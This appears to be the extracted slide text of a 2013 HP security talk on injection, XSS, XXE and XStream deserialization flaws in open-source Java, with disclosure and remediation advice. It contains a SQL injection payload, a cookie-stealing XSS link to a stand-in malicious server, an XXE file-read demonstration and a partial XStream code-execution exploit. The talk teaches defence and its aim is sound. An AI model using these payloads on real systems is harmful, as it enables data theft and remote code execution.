Slide 1

Slide 1 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Critical vulnerability patterns in open-source Java Alvaro Muñoz, Software Security Researcher

Slide 2

Slide 2 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 2 Whois Alvaro Muñoz Employer Hewlett-Packard Organization HP Software Security Research Responsibilities Research the security impact of new technologies. Specially interested on Web stuff, any language, any framework. In previous episodes Application Security Consultant Pentester Other Stuff CTF player, OSCP, GWAPT, CISSP … Location Madrid, Spain @pwntester

Slide 3

Slide 3 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 3 Critical vulnerability patterns in open-source Java Agenda 1.  Why should I care in the first place? 2.  OSS Security Posture 3.  Critical issues in OSS applications 4.  Critical issues in OSS components 5.  Disclosure in the open source world 6.  Five steps to open source peace of mind

Slide 4

Slide 4 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Why should I care in the first place?

Slide 5

Slide 5 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 5 Some metrics “By 2015 ninety-nine percent of mission critical applications in Global 2000 companies will contain open source.” “80% of the code in today’s applications comes from libraries and frameworks” “More than half of Global 500 companies are using open source applications with known vulnerabilities” “26% of library downloads have known vulnerabilities” Gartner & SonaType & Aspect Security Source: https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure-Libraries.pdf

Slide 6

Slide 6 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 6 Using Components with Known Vulnerabilities New OWASP Top10 2013 – A9 Source: http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/OWASP-Top-Ten-2013/ba-p/6046369

Slide 7

Slide 7 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. OSS Security Posture

Slide 8

Slide 8 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 8 The research Goal: •  Figure out the security posture of Open Source Software Procedure: •  Analyze 10 popular Java open source applications with Fortify SCA •  Use the same Fortify SCA version and rulepacks for all tests •  Scan the latest released snapshot as well as a three years old version •  Focus on the critical issues only •  Manually review a popular open source library

Slide 9

Slide 9 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 9 The applications •  Messaging and Integration Patterns server Apache ActiveMQ •  Portlet container Liferay Portal •  Implementation of the Java Servlet and JSP technologies Apache Tomcat •  Application server that implements the Java EE JBoss •  Continuous integration Server Cruise Control •  Full-featured, multi-user and group-blog server Apache Roller •  Enterprise resource planning (ERP) system Ofbiz •  Website content management system OpenCMS •  A light weight, open source, blogger Pebble •  Microfinance institution management system Mifos

Slide 10

Slide 10 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 10 Persistent XSS Reflected XSS Insecure Password submission SQL injection Path Manipulation Privacy Violation XML External Entity Inj Command Injection ActiveMQ ✔ ✔ ✔ ✔ ✔ Apache Roller ✔ ✔ Apache Tomcat ✔ ✔ ✔ ✔ Cruise Control ✔ ✔ ✔ JBoss ✔ ✔ Liferay Portal ✔ ✔ ✔ ✔ OfBiz ✔ ✔ ✔ ✔ OpenCMS ✔ ✔ ✔ Pebble ✔ ✔ Mifos ✔ ✔ SCA Findings

Slide 11

Slide 11 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 11 # Critical findings 0 20 40 60 80 100 120 3 years Current

Slide 12

Slide 12 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 12 # Critical findings Density 0 1 2 3 4 5 6 7 3 years Current

Slide 13

Slide 13 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Critical issues in OSS Applications

Slide 14

Slide 14 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 14 Example 1: SQL Injection 1.  String uid = request.getParameter(“id”); 2.  String query = “select name from Users where id = “ + uid; 3.  dbconn.executeQuery(query); http:///page.jsp?id=1 SELECT name FROM Users WHERE id = 1

Slide 15

Slide 15 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 15 Example 1: SQL Injection 1.  String uid = request.getParameter(“id”); 2.  String query = “select name from Users where id = “ + uid; 3.  dbconn.executeQuery(query); http:///page.jsp?id=1 union select ccid from Cards SELECT name FROM Users WHERE id = 1 UNION SELECT ccid FROM Cards

Slide 16

Slide 16 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 16 Dataflow diagram Example 1 : SQL injection

Slide 17

Slide 17 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 17 1.  @GET 2.  @Consumes({ MediaType.APPLICATION_JSON }) 3.  @Produces({ MediaType.APPLICATION_JSON }) 4.  public String retrieveStaff(UriInfo uriInfo,@QueryParam("sqlSearch") String sqlSearch, @QueryParam("officeId") Long officeId) { 5.  context.authenticatedUser().validateHasReadPermission(resourceNameForPermissions); 6.  final Collection staff = this.readPlatformService.retrieveAllStaff(sqlSearch, officeId); 7.  final ApiRequestJsonSerializationSettings settings = apiRequestParameterHelper.process(uriInfo.getQueryParameters()); 8.  return this.toApiJsonSerializer.serialize(settings, staff, RESPONSE_DATA_PARAMETERS); 9.  }

Slide 18

Slide 18 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 18 1.  @GET 2.  @Consumes({ MediaType.APPLICATION_JSON }) 3.  @Produces({ MediaType.APPLICATION_JSON }) 4.  public String retrieveStaff(UriInfo uriInfo,@QueryParam("sqlSearch") String sqlSearch, @QueryParam("officeId") Long officeId) { 5.  context.authenticatedUser().validateHasReadPermission(resourceNameForPermissions); 6.  final Collection staff = this.readPlatformService.retrieveAllStaff(sqlSearch, officeId); 7.  final ApiRequestJsonSerializationSettings settings = apiRequestParameterHelper.process(uriInfo.getQueryParameters()); 8.  return this.toApiJsonSerializer.serialize(settings, staff, RESPONSE_DATA_PARAMETERS); 9.  }

Slide 19

Slide 19 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 19 1.  @Override 2.  public Collection retrieveAllStaff(final String sqlSearch, final Long officeId) { 3.  final String extraCriteria = getStaffCriteria(sqlSearch, officeId); 4.  return retrieveAllStaff(extraCriteria); 5.  }

Slide 20

Slide 20 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 20 1.  @Override 2.  public Collection retrieveAllStaff(final String sqlSearch, final Long officeId) { 3.  final String extraCriteria = getStaffCriteria(sqlSearch, officeId); 4.  return retrieveAllStaff(extraCriteria); 5.  }

Slide 21

Slide 21 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 21 1.  private String getStaffCriteria(final String sqlSearch, final Long officeId) { 2.  String extraCriteria = "”; 3.  if (sqlSearch != null) { 4.  extraCriteria = " and (" + sqlSearch + ")"; 5.  } 6.  if (officeId != null) { 7.  extraCriteria += " and office_id = " + officeId; 8.  } 9.  if (StringUtils.isNotBlank(extraCriteria)) { 10.  extraCriteria = extraCriteria.substring(4); 11.  } 12.  return extraCriteria; 13.  }

Slide 22

Slide 22 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 22 1.  private String getStaffCriteria(final String sqlSearch, final Long officeId) { 2.  String extraCriteria = "”; 3.  if (sqlSearch != null) { 4.  extraCriteria = " and (" + sqlSearch + ")"; 5.  } 6.  if (officeId != null) { 7.  extraCriteria += " and office_id = " + officeId; 8.  } 9.  if (StringUtils.isNotBlank(extraCriteria)) { 10.  extraCriteria = extraCriteria.substring(4); 11.  } 12.  return extraCriteria; 13.  }

Slide 23

Slide 23 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 23 1.  private String getStaffCriteria(final String sqlSearch, final Long officeId) { 2.  String extraCriteria = "”; 3.  if (sqlSearch != null) { 4.  extraCriteria = " and (" + sqlSearch + ")"; 5.  } 6.  if (officeId != null) { 7.  extraCriteria += " and office_id = " + officeId; 8.  } 9.  if (StringUtils.isNotBlank(extraCriteria)) { 10.  extraCriteria = extraCriteria.substring(4); 11.  } 12.  return extraCriteria; 13.  }

Slide 24

Slide 24 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 24 1.  @Override 2.  public Collection retrieveAllStaff(final String sqlSearch, final Long officeId) { 3.  final String extraCriteria = getStaffCriteria(sqlSearch, officeId); 4.  return retrieveAllStaff(extraCriteria); 5.  }

Slide 25

Slide 25 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 25 1.  @Override 2.  public Collection retrieveAllStaff(final String sqlSearch, final Long officeId) { 3.  final String extraCriteria = getStaffCriteria(sqlSearch, officeId); 4.  return retrieveAllStaff(extraCriteria); 5.  }

Slide 26

Slide 26 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 26 1.  private Collection retrieveAllStaff(final String extraCriteria) { 2.  final StaffMapper rm = new StaffMapper(); 3.  String sql = "select " + rm.schema(); 4.  if (StringUtils.isNotBlank(extraCriteria)) { 5.  sql += " where " + extraCriteria; 6.  } 7.  sql = sql + " order by s.lastname"; 8.  return this.jdbcTemplate.query(sql, rm, new Object[] {}); 9.  }

Slide 27

Slide 27 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 27 1.  private Collection retrieveAllStaff(final String extraCriteria) { 2.  final StaffMapper rm = new StaffMapper(); 3.  String sql = "select " + rm.schema(); 4.  if (StringUtils.isNotBlank(extraCriteria)) { 5.  sql += " where " + extraCriteria; 6.  } 7.  sql = sql + " order by s.lastname"; 8.  return this.jdbcTemplate.query(sql, rm, new Object[] {}); 9.  }

Slide 28

Slide 28 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 28 1.  private Collection retrieveAllStaff(final String extraCriteria) { 2.  final StaffMapper rm = new StaffMapper(); 3.  String sql = "select " + rm.schema(); 4.  if (StringUtils.isNotBlank(extraCriteria)) { 5.  sql += " where " + extraCriteria; 6.  } 7.  sql = sql + " order by s.lastname"; 8.  return this.jdbcTemplate.query(sql, rm, new Object[] {}); 9.  }

Slide 29

Slide 29 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 29 1.  private Collection retrieveAllStaff(final String extraCriteria) { 2.  final StaffMapper rm = new StaffMapper(); 3.  String sql = "select " + rm.schema(); 4.  if (StringUtils.isNotBlank(extraCriteria)) { 5.  sql += " where " + extraCriteria; 6.  } 7.  sql = sql + " order by s.lastname"; 8.  return this.jdbcTemplate.query(sql, rm, new Object[] {}); 9.  }

Slide 30

Slide 30 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 30 Example 2: Cross-Site Scripting

Slide 31

Slide 31 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 31 Example 2: Cross Site Scripting http:///page.jsp?user=John

Hi John!

Hi John!

Slide 32

Slide 32 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 32 Hi! Example 2: Cross Site Scripting http://host/page.jsp?user=alert(“xss”)

Hi alert(“xss”)!

xss

Slide 33

Slide 33 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 33 Will you click on this link?? www.mybank.com/transfers?user=window.open(“http:// maliciousserver.com/cookiestealer.php?” + document.cookie());

Slide 34

Slide 34 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 34 What about this one? http://bit.ly/XSpPhP

Slide 35

Slide 35 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 35 Hialert(“xss”)! Example 2: Cross Site Scripting http://host/page.jsp?user=alert(“xss”)

Hi <script>alert(“xss”)</script>!

Slide 36

Slide 36 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 36 1.  public String paramsAsHidden(Collection excludes) { 2.  StringBuffer result = new StringBuffer(512); 3.  Map params = new HashMap(getJsp().getRequest().getParameterMap()); 4.  Iterator i = params.entrySet().iterator(); 5.  while (i.hasNext()) { 6.  Map.Entry entry = (Map.Entry)i.next(); 7.  String param = (String)entry.getKey(); 8.  if ((excludes == null) || (!excludes.contains(param))) { 9.  result.append("\n"); 14.  } 15.  } 16.  return result.toString(); 17.  }

Slide 37

Slide 37 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 37 1.  public String paramsAsHidden(Collection excludes) { 2.  StringBuffer result = new StringBuffer(512); 3.  Map params = new HashMap(getJsp().getRequest().getParameterMap()); 4.  Iterator i = params.entrySet().iterator(); 5.  while (i.hasNext()) { 6.  Map.Entry entry = (Map.Entry)i.next(); 7.  String param = (String)entry.getKey(); 8.  if ((excludes == null) || (!excludes.contains(param))) { 9.  result.append("\n"); 14.  } 15.  } 16.  return result.toString(); 17.  } Safe output encoding

Slide 38

Slide 38 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 38 1.  public String paramsAsHidden(Collection excludes) { 2.  StringBuffer result = new StringBuffer(512); 3.  Map params = new HashMap(getJsp().getRequest().getParameterMap()); 4.  Iterator i = params.entrySet().iterator(); 5.  while (i.hasNext()) { 6.  Map.Entry entry = (Map.Entry)i.next(); 7.  String param = (String)entry.getKey(); 8.  if ((excludes == null) || (!excludes.contains(param))) { 9.  result.append("\n"); 14.  } 15.  } 16.  return result.toString(); 17.  }

Slide 39

Slide 39 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 39 1.  public String paramsAsHidden(Collection excludes) { 2.  StringBuffer result = new StringBuffer(512); 3.  Map params = new HashMap(getJsp().getRequest().getParameterMap()); 4.  Iterator i = params.entrySet().iterator(); 5.  while (i.hasNext()) { 6.  Map.Entry entry = (Map.Entry)i.next(); 7.  String param = (String)entry.getKey(); 8.  if ((excludes == null) || (!excludes.contains(param))) { 9.  result.append("\n"); 14.  } 15.  } 16.  return result.toString(); 17.  }

Slide 40

Slide 40 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 40 1.  public String paramsAsHidden(Collection excludes) { 2.  StringBuffer result = new StringBuffer(512); 3.  Map params = new HashMap(getJsp().getRequest().getParameterMap()); 4.  Iterator i = params.entrySet().iterator(); 5.  while (i.hasNext()) { 6.  Map.Entry entry = (Map.Entry)i.next(); 7.  String param = (String)entry.getKey(); 8.  if ((excludes == null) || (!excludes.contains(param))) { 9.  result.append("\n"); 14.  } 15.  } 16.  return result.toString(); 17.  }

Slide 41

Slide 41 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 41 1.  public String paramsAsHidden(Collection excludes) { 2.  StringBuffer result = new StringBuffer(512); 3.  Map params = new HashMap(getJsp().getRequest().getParameterMap()); 4.  Iterator i = params.entrySet().iterator(); 5.  while (i.hasNext()) { 6.  Map.Entry entry = (Map.Entry)i.next(); 7.  String param = (String)entry.getKey(); 8.  if ((excludes == null) || (!excludes.contains(param))) { 9.  result.append("\n"); 14.  } 15.  } 16.  return result.toString(); 17.  }

Slide 42

Slide 42 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 42 Example 3: Path Manipulation

Slide 43

Slide 43 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 43 1.  public View process(HttpServletRequest request, HttpServletResponse response) throws ServletException { 2.  Blog blog = (Blog)getModel().get(Constants.BLOG_KEY); 3.  String name = request.getParameter("name"); 4.  String type = request.getParameter("type"); 5.  String path = request.getParameter("path"); 6.  String content = request.getParameter("fileContent"); 7.  try { 8.  FileManager fileManager = new FileManager(blog, type); 9.  fileManager.saveFile(path, name, content); 10.  if (type.equals(FileMetaData.THEME_FILE)) { 11.  fileManager = new FileManager(blog, FileMetaData.BLOG_DATA); 12.  fileManager.saveFile("/theme" + path, name, content); 13.  } 14.  blog.info("File \"" + StringUtils.transformHTML(name) + "\" saved."); 15.  } catch (IllegalFileAccessException e) { 16.  return new ForbiddenView(); 17.  } catch (IOException ioe) { 18.  throw new ServletException(ioe); 19.  } 20.  return new ForwardView("/editFile.secureaction"); 21.  }

Slide 44

Slide 44 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 44 1.  public void saveFile(String path, String name, String content) throws IOException, IllegalFileAccessException { 2.  FileMetaData subDirectory = getFileMetaData(path); 3.  File fileToSave = new File(getFile(subDirectory), name); 4.  if (!isUnderneathRootDirectory(fileToSave)) { 5.  throw new IllegalFileAccessException(); 6.  } 7.  BufferedWriter writer = null; 8.  try { 9.  writer = new BufferedWriter(new FileWriter(fileToSave)); 10.  writer.write(content); 11.  writer.flush(); 12.  } finally { 13.  IOUtils.closeQuietly(writer); 14.  } 15.  }

Slide 45

Slide 45 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Critical issues in OSS Components

Slide 46

Slide 46 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 46 A closer look at Spring In their own words:

Slide 47

Slide 47 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 47 Security issues reported: Timeline Date CVE # Description 09 October 2012 CVE-2012-5055 Spring Security's DaoAuthenticationProvider can reveal if a username is valid 29 March 2012 CVE-2012-1833 Grails data binding vulnerability 9 September 2011 CVE-2011-2894 Spring Framework and Spring Security serialization-based remoting vulnerabilities 9 September 2011 CVE-2011-2732 Spring Security header injection vulnerability 9 September 2011 CVE-2011-2731 Spring Security Privilege escalation when using RunAsManager 9 September 2011 CVE-2011-2730 Spring Framework Information Disclosure and remote code execution 10 August 2011 CVE-2011-0527 vFabric tc Server password obfuscation bypass 24 May 2011 CVE-2011-1942 Spring Web Services: Information Disclosure 5 February 2011 CVE-2009-2899 Hyperic HQ: Information disclosure 27 October 2010 CVE-2010-3700 Spring Security: Bypass of security constraints 17 June 2010 CVE-2010-1622 Spring Framework: Execution of arbitrary code 13 May 2010 CVE-2010-1454 tc Server Runtime: Unauthenticated access to remote JMX interface 23 March 2010 CVE-2009-2907 Hyperic HQ: Multiple XSS 2 October 2009 CVE-2009-2898 Hyperic HQ: Stored XSS 2 October 2009 CVE-2009-2897 Hyperic HQ: Reflected XSS 22 April 2009 CVE-2009-1190 Spring Framework: Remote denial of service

Slide 48

Slide 48 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 48 RESTFul APIs •  RESTFul APIs are becoming more popular •  They can be found everywhere, especially for powering up mobile applications •  The most popular frameworks for Java are JAX-RS and SpringMVC •  SpringMVC uses SpringOXM to un-marshall the incoming XML messages into Java Objects John Smith Friend public void createContact(Contact c) { save(c); log(c.getDescription()); }

Slide 49

Slide 49 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 49 XML Entities XML External Entity Injection (XXE) ”>]> … … &terms; …

Slide 50

Slide 50 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 50 XML Entities XML External Entity Injection (XXE) ]> … … &terms; …

Slide 51

Slide 51 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 51 Anatomy of an XXE Attack public void createContact(Contact c) { save(c); } public Contact getContact(Long id) { Contact c = getContact(id); return c; } RESTFul WebService

Slide 52

Slide 52 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 52 Anatomy of an XXE Attack John Smith Friend public void createContact(Contact c) { save(c); } RESTFul WebService public Contact getContact(Long id) { Contact c = getContact(id); return c; }

Slide 53

Slide 53 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 53 Anatomy of an XXE Attack public void createContact(Contact c) { save(c); } Name: John! Last name: Smith! Description:! Friend! RESTFul WebService public Contact getContact(Long id) { Contact c = getContact(id); return c; } John Smith Friend

Slide 54

Slide 54 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 54 Anatomy of an XXE Attack John Smith &xxe; ]> public Contact getContact(Long id) { Contact c = getContact(id); return c; } public void createContact(Contact c) { save(c); }

Slide 55

Slide 55 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 55 John Smith &xxe; Anatomy of an XXE Attack Name: John! Last name: Smith! Description:! root:*:0:0:System:/var/root:/bin/sh! user1:*:0:0:System:/var/root:/bin/sh! user2:*:0:0:System:/var/root:/bin/sh! user3:*:0:0:System:/var/root:/bin/sh! ! public void createContact(Contact c) { save(c); } public Contact getContact(Long id) { Contact c = getContact(id); return c; } ]>

Slide 56

Slide 56 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 56 SpringOXM unmarshallers SpringOXM is a wrapper around a a variety of unmarshalers including: •  JAXB •  Castor •  XStream Our research concludes that: •  Xstream Wrapper is not vulnerable since it does not process DOCTYPE blocks •  Castor Wrapper is insecure but there is an undocumented way to secure it •  JAXB Wrapper is insecure and there is no way to secure it Unfortunately JAXB is by far the most popular

Slide 57

Slide 57 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 57

Slide 58

Slide 58 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 58 •  XStream is not exactly a marshaller as it allows full object serialization •  http://xstream.codehaus.org/converters.html contains a complete list of objects that can be serialized •  One interesting class: DynamicProxyConverter Remote Code Execution in XStream unmarshaller

Slide 59

Slide 59 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 59 What is a DynamicProxy again? A way to intercept method calls on an interface and inject custom code Class filed1 field2 method1 method2 method3

Slide 60

Slide 60 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 60 What is a DynamicProxy again? A way to intercept method calls on an interface and inject custom code Interface method1 method2 Implementation filed1 field2 method1 method2 method3

Slide 61

Slide 61 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 61 What is a DynamicProxy again? A way to intercept method calls on an interface and inject custom code Interface method1 method2 Object filed1 field2 method1 method2 method3 Proxy method2 Custom code

Slide 62

Slide 62 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 62 Turning a Feature into a Bug Attacker’s plan: •  Find out what Class the XML will be deserialized to •  Create a proxy for that Class the WebService is waiting for •  Intercept/hook any call to any method in the interface •  Replace the original call with the malicious payload •  Send the serialized version of the proxy •  Cross-fingers •  Profit

Slide 63

Slide 63 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 63

Slide 64

Slide 64 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 64 Exploit 1 <firstName>alvarofirstName> munoz [email protected]

Slide 65

Slide 65 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 65 Exploit org.company.model.Contact calc.exe start 1 <firstName>alvarofirstName> munoz [email protected]

Slide 66

Slide 66 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 66 Meanwhile in the application code … 1.  @Controller 2.  @RequestMapping("/contacts") 3.  public class ContactController { 4.  @Autowired 5.  private ContactRepository contactRepository; 6.  @RequestMapping( method = RequestMethod.POST ) 7.  @ResponseStatus( HttpStatus.CREATED ) 8.  public final String create( @RequestBody Contact contact ){ 9.  log(”Creating new contact: " + contact.getFirstName()); 10.  contactRepository.save(contact); 11.  return "OK"; 12.  } 13.  }

Slide 67

Slide 67 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 67 1.  @Controller 2.  @RequestMapping("/contacts") 3.  public class ContactController { 4.  @Autowired 5.  private ContactRepository contactRepository; 6.  @RequestMapping( method = RequestMethod.POST ) 7.  @ResponseStatus( HttpStatus.CREATED ) 8.  public final String create( @RequestBody Contact contact ){ 9.  log(”Creating new contact: " + contact.getFirstName()); 10.  contactRepository.save(contact); 11.  return "OK"; 12.  } 13.  } Meanwhile in the application code …

Slide 68

Slide 68 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 68

Slide 69

Slide 69 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Disclosure in the Open Source World

Slide 70

Slide 70 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 70 Responsible Disclosure •  Open Source projects have been notified about the issues found during this research •  Reactions cover the whole spectrum: from immediate response to no response at all Special thanks to the developers and maintainers of the SpringSource project for their prompt responses

Slide 71

Slide 71 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 71 https://github.com/EllisLab/CodeIgniter/pull/1888#issuecomment-9427869 CodeIgniter Github Repository

Slide 72

Slide 72 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 72 https://github.com/EllisLab/CodeIgniter/pull/1888#issuecomment-9427869 CodeIgniter Github Repository

Slide 73

Slide 73 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 73 https://github.com/EllisLab/CodeIgniter/pull/1888#issuecomment-9427869 CodeIgniter Github Repository

Slide 74

Slide 74 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 74 https://github.com/EllisLab/CodeIgniter/pull/1888#issuecomment-9427869 CodeIgniter Github Repository

Slide 75

Slide 75 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 75 https://github.com/EllisLab/CodeIgniter/pull/1888#issuecomment-9427869 CodeIgniter Github Repository The conversation goes on … Conclusion, 9 months after the issue is still open!

Slide 76

Slide 76 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 76

Slide 77

Slide 77 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 77 OSS developers Vs. Security Researchers Gap Developers vs. security auditors is an ongoing battle •  OSS is not an exception •  In mature OSS projects there is a Security team to smooth it down Security researchers cannot just break in and try to change how things are done •  Developers need remediation guidance Security issues are normally reported in a non actionable way •  Developers need to understand issues if you want them to change their code Avoid using security buzzy talk e.g.: Cross-site scripting vs Lack of output encoding

Slide 78

Slide 78 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 78 Rewarding Researchers for Responsibly Disclosing Vulnerabilities Zero Day Initiative (ZDI) World’s Leading Vulnerability Bounty Program •  Network of Almost 3,000 Researchers Worldwide •  $8 Million Paid to Researchers •  Disclosed Over 1300 Vulnerabilities Patching of Critical Defects in Software •  36% of Oracle Java’s Critical Vulnerabilities with CVSS > 9.0 •  ~50% of Microsoft Critical Vulnerabilities in 2013 Proven Thought Leadership •  Pwn2Own Hacking Competition Series •  Frost & Sullivan Market Share Leader 2012 •  Leader in Critical Vulnerability Disclosures in 2013

Slide 79

Slide 79 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Five steps to open source peace of mind

Slide 80

Slide 80 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 80 Step 1: Identify your open source usage 1.1 Identify Open Source Software used throughout your company and versions –  Libraries –  Frameworks –  Middleware –  Applications 100% open source (CMS, Blogs, Application servers …) 1.2 Create and validate against a release policy –  Automate this process when possible 1.3 Use data collected to build profiles on each project –  Open source code’s origin –  Where to get updates (including security alerts) –  How often the community releases new versions

Slide 81

Slide 81 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 81 Step 2: Assess OSS for vulnerabilities / fix issues 2.1 Evaluate the open source code used in your enterprise for vulnerabilities –  Community bug tracking system and mailing lists –  BugTraq (www.securityfocus.com) –  MITRE’s Common Vulnerability and Exposures (CVE) (cve.mitre.org) –  Open Sourced Vulnerability Database (http://www.osvdb.org) –  National Vulnerability Database (http://nvd.nist.gov) 2.2 Security Testing –  Automated Static, Dynamic, and Runtime Analysis for OSS Components –  Manual Code Review 2.3 Fixing vulnerabilities –  Ask the open source community to fix them –  Fix them yourself

Slide 82

Slide 82 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 82 Step 3: Develop open source usage policies 3.1 Establish a policy on acceptable open source usage within your enterprise –  Using your inventory and risk assessments, generate a list of approved OSS –  OSS should be maintained in an internal repository –  Create the processes to update and maintain the repository 3.2 Communication –  Project managers –  Developers –  Testers –  Architects –  Application owners

Slide 83

Slide 83 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 83 Step 4: Develop a patch management process 4.1 Don’t forget to include OSS in your patch management process –  When new vulnerabilities are identified: •  Explore possible mitigation strategies to implement until patch is available •  Once released, inform your development teams •  Make sure there is a patch plan in place

Slide 84

Slide 84 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 84 Step 5: Create a compliance gate 5.1 Compliance validation for the OSS usage policy –  Add a compliance check to any existing security or verification steps in your SDLC –  Periodic compliance checks

Slide 85

Slide 85 text

